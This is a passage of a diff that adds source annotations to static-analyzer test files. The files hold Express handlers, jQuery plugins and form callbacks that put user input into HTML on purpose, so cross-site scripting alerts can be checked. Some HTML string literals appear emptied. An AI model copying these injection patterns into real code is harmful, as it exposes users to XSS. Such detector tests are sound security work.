app.get("invalid/keys/:id", async (req, res) => { - const { keys: queryKeys } = req.query; + const { keys: queryKeys } = req.query; // $ Source const paramKeys = req.params; - const keys = queryKeys || paramKeys?.keys; + const keys = queryKeys || paramKeys?.keys; // $ Source const keyArray = typeof keys === 'string' ? [keys] : keys; const invalidKeys = keyArray.filter(key => !whitelist.includes(key)); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js index 5ab9f9d6f265..996f093aa15c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js @@ -132,7 +132,7 @@ function escapeHtml4(s) { } app.get('/user/:id', function (req, res) { - const url = req.params.id; + const url = req.params.id; // $ Source res.send(escapeHtml1(url)); res.send(escapeHtml2(url)); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js index c7e60092d7ef..8377357a0c4c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js @@ -6,7 +6,7 @@ app.get("/some/path", (req, res) => { let response = "Hello, world!"; if(req.query.jsonp && isVarName(req.query.jsonp)) - response = req.query.jsonp + "(" + response + ")"; + response = req.query.jsonp + "(" + response + ")"; // $ Source res.send(response); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js index 448f12270783..a359780e57b0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js @@ -1,7 +1,7 @@ var express = require('express'); express().get('/user/', function(req, res) { - var evil = req.query.evil; + var evil = req.query.evil; // $ Source res.send(console.log("
%s
", evil)); // OK - returns undefined res.send(util.format("
%s
", evil)); // $ Alert res.send(require("printf")("
%s
", evil)); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js index cd6ca0c9e3da..9e03025792d0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js @@ -1,13 +1,13 @@ var liveServer = require("live-server"); const middleware = [function(req, res, next) { - const tainted = req.url; + const tainted = req.url; // $ Source res.end(`${tainted}`); // $ Alert }]; middleware.push(function(req, res, next) { - const tainted = req.url; + const tainted = req.url; // $ Source res.end(`${tainted}`); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js index 105080e5fba2..a0f2120b2c4f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js @@ -10,7 +10,7 @@ app.get("/some/path", (req, res) => { res.send(x + y); // $ Alert } - let callback = sendResponse.bind(null, req.url); + let callback = sendResponse.bind(null, req.url); // $ Source [1, 2, 3].forEach(callback); }); @@ -19,7 +19,7 @@ app.get("/underscore", (req, res) => { res.send(x + y); // $ Alert } - let callback = underscore.partial(sendResponse, req.url); + let callback = underscore.partial(sendResponse, req.url); // $ Source [1, 2, 3].forEach(callback); }); @@ -28,7 +28,7 @@ app.get("/lodash", (req, res) => { res.send(x + y); // $ Alert } - let callback = lodash.partial(sendResponse, req.url); + let callback = lodash.partial(sendResponse, req.url); // $ Source [1, 2, 3].forEach(callback); }); @@ -37,7 +37,7 @@ app.get("/ramda", (req, res) => { res.send(x + y); // $ Alert } - let callback = R.partial(sendResponse, [req.url]); + let callback = R.partial(sendResponse, [req.url]); // $ Source [1, 2, 3].forEach(callback); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js index 392a1f7ec612..41eb48b68d65 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js @@ -2,7 +2,7 @@ let express = require('express'); let app = express(); app.get("/some/path", (req, res) => { - new Promise((resolve, reject) => resolve(req.query.data)) + new Promise((resolve, reject) => resolve(req.query.data)) // $ Source .then(x => res.send(x)); // $ Alert new Promise((resolve, reject) => resolve(req.query.data)) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js index 35021ea39120..660743338848 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js @@ -3,7 +3,7 @@ var express = require('express'); var app = express(); app.get('/user/:id', function(req, res) { - let { p, q: r } = req.params; + let { p, q: r } = req.params; // $ Source res.send(p); // $ Alert res.send(r); // $ Alert }); @@ -11,7 +11,7 @@ app.get('/user/:id', function(req, res) { const aKnownValue = "foo"; app.get('/bar', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source if (p == aKnownValue) res.send(p); @@ -27,7 +27,7 @@ app.get('/bar', function(req, res) { const clone = require('clone'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; @@ -40,7 +40,7 @@ app.get('/baz', function(req, res) { const serializeJavaScript = require('serialize-javascript'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var serialized = serializeJavaScript(p); @@ -54,7 +54,7 @@ app.get('/baz', function(req, res) { const fclone = require('fclone'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; @@ -66,7 +66,7 @@ app.get('/baz', function(req, res) { const jc = require('json-cycle'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; @@ -79,7 +79,7 @@ app.get('/baz', function(req, res) { const sortKeys = require('sort-keys'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js index 61d153498e74..5419959d61ec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js @@ -2,12 +2,12 @@ var express = require('express'); var app = express(); app.enable('x-powered-by').disable('x-powered-by').get('/', function (req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source res.send(p); // $ Alert }); const prettier = require("prettier"); app.post("foobar", function (reg, res) { - const code = prettier.format(reg.body, { semi: false, parser: "babel" }); + const code = prettier.format(reg.body, { semi: false, parser: "babel" }); // $ Source res.send(code); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js index be96d05a400a..0233339ad26e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js @@ -4,7 +4,7 @@ var fs = require('fs'); var express = require('express'); express().get('/', function(req, res) { - fs.readdir("/myDir", function (error, files1) { + fs.readdir("/myDir", function (error, files1) { // $ Source res.send(files1); // $ Alert }); }); @@ -22,7 +22,7 @@ http.createServer(function (req, res) { return files3.join(''); } - fs.readdir("/myDir", function (error, files1) { + fs.readdir("/myDir", function (error, files1) { // $ Source res.write(files1); // $ Alert var dirs = []; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js index 4f712f2604e7..2569f5623d74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js @@ -3,6 +3,6 @@ const parseTorrent = require('parse-torrent'), express().get('/user/:id', function(req, res) { let torrent = parseTorrent(unknown), - name = torrent.name; + name = torrent.name; // $ Source res.send(name); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js index fb229199e687..40f33d8edb3f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js @@ -8,7 +8,7 @@ $("" + $.trim("foo") + ""); })); -$.fn.myPlugin = function (stuff, options) { +$.fn.myPlugin = function (stuff, options) { // $ Source $("#foo").html("" + options.foo + ""); // $ Alert $("#foo").html("" + stuff + ""); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts index 9c48ed8c23f5..7e546c05d103 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts @@ -1,4 +1,4 @@ -export function trivialXss(s: string) { +export function trivialXss(s: string) { // $ Source const html = "" + s + ""; // $ Alert document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts index 3ec0e2007396..a69e6e5626d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts @@ -1,9 +1,9 @@ -export function trivialXss(s: string) { +export function trivialXss(s: string) { // $ Source const html = "" + s + ""; // $ Alert - this file is recognized as a main file. document.querySelector("#html").innerHTML = html; } -export function objectStuff(settings: any, i: number) { +export function objectStuff(settings: any, i: number) { // $ Source document.querySelector("#html").innerHTML = "" + settings + ""; // $ Alert var name; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts index 9566ce8468a8..3c7ac0103431 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts @@ -1,4 +1,4 @@ -export function trivialXss(s: string) { +export function trivialXss(s: string) { // $ Source const html = "" + s + ""; // $ Alert - this file is not recognized as a main file. document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 061a82c862d7..78da04582957 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js @@ -1,14 +1,14 @@ -module.exports.xssThroughHTMLConstruction = function (s) { +module.exports.xssThroughHTMLConstruction = function (s) { // $ Source const html = "" + s + "";// $ Alert document.querySelector("#html").innerHTML = html; } -module.exports.xssThroughXMLParsing = function (s) { +module.exports.xssThroughXMLParsing = function (s) { // $ Source const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert document.querySelector("#xml").appendChild(doc.documentElement); } -module.exports.xssThroughMoreComplexXMLParsing = function (s) { +module.exports.xssThroughMoreComplexXMLParsing = function (s) { // $ Source const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert const xml = doc.documentElement; @@ -18,7 +18,7 @@ module.exports.xssThroughMoreComplexXMLParsing = function (s) { } const markdown = require('markdown-it')({html: true}); -module.exports.xssThroughMarkdown = function (s) { +module.exports.xssThroughMarkdown = function (s) { // $ Source const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } @@ -53,7 +53,7 @@ module.exports.createsClass = function (s) { return new Foo(s); } -$.fn.xssPlugin = function (options) { +$.fn.xssPlugin = function (options) { // $ Source const defaults = { name: "name" }; @@ -63,7 +63,7 @@ $.fn.xssPlugin = function (options) { }); } -module.exports.guards = function (attrVal) { +module.exports.guards = function (attrVal) { // $ Source document.querySelector("#id").innerHTML = "\"""; // $ Alert document.querySelector("#id").innerHTML = "\"""; if (attrVal.indexOf("\"") === -1 && attrVal.indexOf("'") === -1) { @@ -76,7 +76,7 @@ module.exports.intentionalTemplate = function (obj) { document.querySelector("#template").innerHTML = html; } -module.exports.types = function (val) { +module.exports.types = function (val) { // $ Source if (typeof val === "string") { $("#foo").html("" + val + ""); // $ Alert } else if (typeof val === "number") { @@ -90,12 +90,12 @@ function createHTML(x) { return "" + x + ""; // $ Alert } -module.exports.usesCreateHTML = function (x) { +module.exports.usesCreateHTML = function (x) { // $ Source $("#foo").html(createHTML(x)); } const myMermaid = require('mermaid'); -module.exports.usesCreateHTML = function (x) { +module.exports.usesCreateHTML = function (x) { // $ Source myMermaid.render("id", x, function (svg) { // $ Alert $("#foo").html(svg); }); @@ -113,7 +113,7 @@ module.exports.usesCreateHTML = function (x) { }); } -module.exports.xssThroughMarkdown = function (s) { +module.exports.xssThroughMarkdown = function (s) { // $ Source const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts index a00719d74408..1c50460050cf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts @@ -1,9 +1,9 @@ -export function basicHtmlConstruction(s: string) { +export function basicHtmlConstruction(s: string) { // $ Source const html = "" + s + ""; // $ Alert document.body.innerHTML = html; } -export function insertIntoCreatedDocument(s: string) { +export function insertIntoCreatedDocument(s: string) { // $ Source const newDoc = document.implementation.createHTMLDocument(""); newDoc.body.innerHTML = "" + s + ""; // $ SPURIOUS: Alert - inserted into document disconnected from the main DOM. } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js index 896c4f8af210..315644f407df 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js @@ -1,5 +1,5 @@ (function(){ - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(options); // $ Alert - or is it? $(options.target); // $ Alert @@ -62,18 +62,18 @@ }; - $.fn.my_plugin = function my_plugin(element, options) { + $.fn.my_plugin = function my_plugin(element, options) { // $ Source this.$element = $(element); this.options = $.extend({}, options); if (this.options.parent) this.$parent = $(this.options.parent) // $ Alert }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(options.foo.bar.baz); // $ Alert $(options.html); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(x).appendTo(options.foo.bar.baz); // $ Alert }; @@ -81,7 +81,7 @@ $("#" + options.target); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source function f(o) { this.o = $.extend({}, o); var t = this.o.target; @@ -98,7 +98,7 @@ $(target); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source options = $.extend({ menu: '
', target: '.my_plugin' @@ -111,28 +111,28 @@ menu: '
', target: '.my_plugin' }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source options = $.extend({}, $.fn.my_plugin.defaults, options); $(options.menu); $(options.target); // $ Alert }; var pluginName = "my_plugin"; - $.fn[pluginName] = function my_plugin(options) { + $.fn[pluginName] = function my_plugin(options) { // $ Source $(options.target); // $ Alert }; $.extend($.fn, { - my_plugin: function my_plugin(options) { + my_plugin: function my_plugin(options) { // $ Source $(options.target); // $ Alert } }); - $.fn.affix = function my_plugin(options) { + $.fn.affix = function my_plugin(options) { // $ Source $(options.target); // $ Alert }; - $.fn.tooltip = function my_plugin(options) { + $.fn.tooltip = function my_plugin(options) { // $ Source $(options.viewport.selector); // $ Alert }; @@ -150,14 +150,14 @@ $(unintentional); // OK - but should be flagged by another query } - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source let target = options.target; target === DEFAULTS.target? $(target): $(document).find(target); options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // $ SPURIOUS: Alert - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties } - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(anyPrefix + options.target); // OK - unlikely to be a html/css prefix confusion $(something.replace("%PLACEHOLDER%", options.target)); // OK - (unlikely to be a html/css prefix confusion); @@ -175,14 +175,14 @@ function setupPlugin(o) { $.fn.my_plugin = o.f } - setupPlugin({f: function(options) { + setupPlugin({f: function(options) { // $ Source $(options.target); // $ Alert }}); setupPlugin({f:function(options) { $(document).find(options.target); }}); - $.fn.position = function( options ) { + $.fn.position = function( options ) { // $ Source if ( !options || !options.of ) { return doSomethingElse( this, arguments ); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts index e9ca1f400890..084950e8e08e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts @@ -9,7 +9,7 @@ import { NgForm } from "@angular/forms"; ` }) export class Foo { - field: string = ""; + field: string = ""; // $ Source safeField: string = ""; setInput1(event) { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js index c78fc9284a15..e57ef84dc429 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js @@ -5,10 +5,10 @@ const FormikBasic = () => (
{ + validate={values => { // $ Source $("#id").html(values.foo); // $ Alert }} - onSubmit={(values, { setSubmitting }) => { + onSubmit={(values, { setSubmitting }) => { // $ Source $("#id").html(values.bar); // $ Alert }} > @@ -21,17 +21,17 @@ const FormikBasic = () => ( const FormikEnhanced = withFormik({ mapPropsToValues: () => ({ name: '' }), - validate: values => { + validate: values => { // $ Source $("#id").html(values.email); // $ Alert }, - handleSubmit: (values, { setSubmitting }) => { + handleSubmit: (values, { setSubmitting }) => { // $ Source $("#id").html(values.email); // $ Alert } })(MyForm); (function () { - const { values, submitForm } = useFormikContext(); + const { values, submitForm } = useFormikContext(); // $ Source $("#id").html(values.email); // $ Alert $("#id").html(submitForm.email); @@ -41,7 +41,7 @@ import { Form } from 'react-final-form' const App = () => (
{ + onSubmit={async values => { // $ Source $("#id").html(values.stooge); // $ Alert }} initialValues={{ stooge: 'larry', employed: false }} @@ -68,7 +68,7 @@ import { useForm } from 'react-hook-form'; function HookForm() { const { register, handleSubmit, errors } = useForm(); // initialize the hook - const onSubmit = (data) => { + const onSubmit = (data) => { // $ Source $("#id").html(data.name); // $ Alert }; @@ -89,7 +89,7 @@ function HookForm2() {